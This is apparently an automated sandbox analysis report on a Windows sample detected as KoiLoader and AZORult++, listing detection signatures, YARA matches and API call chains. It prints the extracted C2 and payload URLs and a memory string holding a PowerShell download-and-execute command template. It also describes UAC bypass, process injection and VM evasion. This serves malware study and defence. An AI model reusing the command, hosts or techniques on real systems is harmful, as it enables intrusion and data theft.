Edit tour

Windows Analysis Report
JT1yqn67un.exe

Overview

General Information

Sample name:	JT1yqn67un.exe renamed because original name is a hash value
Original sample name:	9e88e85a46486f7f56b3aaba6e29737c.exe
Analysis ID:	1528834
MD5:	9e88e85a46486f7f56b3aaba6e29737c
SHA1:	c33d28a63c240f4677b185e7cbc918da3d4f49ec
SHA256:	deb72a5ebd26b40dc1847314d896b4e768f6f14d95fcfcbf1046c65518df5883
Tags:	exeKoiLoaderuser-abuse_ch
Infos:

Detection

AZORult++, KoiLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Contains functionality to bypass UAC (CMSTPLUA)

Detected AZORult++ Trojan

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected KoiLoader

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contain functionality to detect virtual machines

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking locale)

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

JT1yqn67un.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\JT1yqn67un.exe" MD5: 9E88E85A46486F7F56B3AABA6E29737C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Koi Loader		No Attribution	https://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer	https://malpedia.caad.fkie.fraunhofer.de/details/win.koiloader

Malware Configuration

Threatname: KoiLoader

{"C2": "http://2.58.14.95/malto.php", "Payload url": "https://lacasadelverde.com/css"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: JT1yqn67un.exe PID: 7460	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
Process Memory Space: JT1yqn67un.exe PID: 7460	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.JT1yqn67un.exe.5e0000.0.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.JT1yqn67un.exe.5e0000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.JT1yqn67un.exe.5e0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1808:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x9bf6:$s1: CoGetObject
0.2.JT1yqn67un.exe.bb0b78.1.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.JT1yqn67un.exe.bb0b78.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1808:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x9bf6:$s1: CoGetObject
Click to see the 3 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: JT1yqn67un.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: KoiLoader {"C2": "http://2.58.14.95/malto.php", "Payload url": "https://lacasadelverde.com/css"}

Multi AV Scanner detection for submitted file

Source: JT1yqn67un.exe	ReversingLabs: Detection: 71%
Source: JT1yqn67un.exe	Virustotal: Detection: 58%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: JT1yqn67un.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E8710 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,		0_2_005E8710
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E93B0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,		0_2_005E93B0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.JT1yqn67un.exe.bb0b78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JT1yqn67un.exe PID: 7460, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_005E72E0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,lstrlenW,ExpandEnvironmentStringsW,GetSystemWow64DirectoryW,GetLastError,wnsprintfW,wnsprintfW,ExpandEnvironmentStringsW,wnsprintfW,SetFileAttributesW,lstrcpyW,GetUserNameW,NetUserGetInfo,NetApiBufferFree,CoInitializeEx,lstrlenW,wsprintfW,CoGetObject,CoUninitialize,

0_2_005E72E0

Source: JT1yqn67un.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: JT1yqn67un.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_00F0993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_00F0993E
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,		0_2_005E89F0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://2.58.14.95/malto.php

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_005E6410 inet_pton,inet_pton,htons,htons,inet_pton,htons,socket,socket,connect,connect,socket,connect,closesocket,select,recv,send,select,closesocket,closesocket,GetProcessHeap,HeapFree,

0_2_005E6410

Source: JT1yqn67un.exe	String found in binary or memory: http://2.58.14.95/malto.php
Source: JT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://2.58.14.95/malto.php%temp%
Source: JT1yqn67un.exe	String found in binary or memory: https://lacasadelverde.com/css
Source: JT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lacasadelverde.com/css/c

E-Banking Fraud

Detected AZORult++ Trojan

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_005E9250 EntryPoint,GetUserDefaultLangID,ExitProcess,

0_2_005E9250

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E5C60 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,		0_2_005E5C60
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E5FD0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,		0_2_005E5FD0

Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_00F0FBC1	0_2_00F0FBC1
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E89F0	0_2_005E89F0
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E7C30	0_2_005E7C30
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E26A0	0_2_005E26A0
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E7710	0_2_005E7710
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E43D0	0_2_005E43D0
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E47D0	0_2_005E47D0

Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: String function: 00F050E0 appears 33 times
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: String function: 00F03CE0 appears 82 times

Source: JT1yqn67un.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.bank.troj.expl.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_005E6370 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_005E6370

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_005E6C60 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,

0_2_005E6C60

Source: JT1yqn67un.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: JT1yqn67un.exe	ReversingLabs: Detection: 71%
Source: JT1yqn67un.exe	Virustotal: Detection: 58%

Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: JT1yqn67un.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: JT1yqn67un.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: JT1yqn67un.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: JT1yqn67un.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: JT1yqn67un.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: JT1yqn67un.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: JT1yqn67un.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: JT1yqn67un.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: JT1yqn67un.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: JT1yqn67un.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: JT1yqn67un.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: JT1yqn67un.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: JT1yqn67un.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected KoiLoader

Source: Yara match	File source: 0.2.JT1yqn67un.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.JT1yqn67un.exe.bb0b78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.JT1yqn67un.exe.bb0b78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JT1yqn67un.exe PID: 7460, type: MEMORYSTR

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_00F01300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00F01300

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_00F102D1 push ecx; ret

0_2_00F102E4

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe

0_2_005E89F0

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_005E89F0

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-13001

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-13187

Source: C:\Users\user\Desktop\JT1yqn67un.exe

File opened / queried: C:\Windows\System32\VBoxService.exe

Jump to behavior

Source: C:\Users\user\Desktop\JT1yqn67un.exe

API coverage: 9.8 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_00F0993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_00F0993E
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,		0_2_005E89F0

Source: JT1yqn67un.exe	Binary or memory string: Hyper-V
Source: JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: POST%s\|%s\|hhlT6dDnStart%d\|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://2.58.14.95/malto.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://lacasadelverde.com/css/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: JT1yqn67un.exe	Binary or memory string: VMWare
Source: JT1yqn67un.exe	Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: JT1yqn67un.exe	Binary or memory string: %systemroot%\System32\VBoxTray.exe

Source: C:\Users\user\Desktop\JT1yqn67un.exe	API call chain: ExitProcess graph end node			graph_0-13106
Source: C:\Users\user\Desktop\JT1yqn67un.exe	API call chain: ExitProcess graph end node			graph_0-11654

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_00F076CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00F076CB

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_00F01300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00F01300

Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_00F01710 mov ecx, dword ptr fs:[00000030h]	0_2_00F01710
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E7920 mov eax, dword ptr fs:[00000030h]	0_2_005E7920
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_005E5FD0 mov eax, dword ptr fs:[00000030h]	0_2_005E5FD0

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_00F0B779 GetProcessHeap,

0_2_00F0B779

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_00F05016 SetUnhandledExceptionFilter,	0_2_00F05016
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_00F049BE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00F049BE
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_00F076CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F076CB
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: 0_2_00F04E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F04E89

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_005E5C60 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,

0_2_005E5C60

Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, \explorer.exe	0_2_005E94B0
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe	0_2_005E94B0
Source: C:\Users\user\Desktop\JT1yqn67un.exe	Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe	0_2_005E94B0

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_00F05125 cpuid

0_2_00F05125

Source: C:\Users\user\Desktop\JT1yqn67un.exe

Code function: 0_2_00F04D70 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00F04D70

Source: C:\Users\user\Desktop\JT1yqn67un.exe

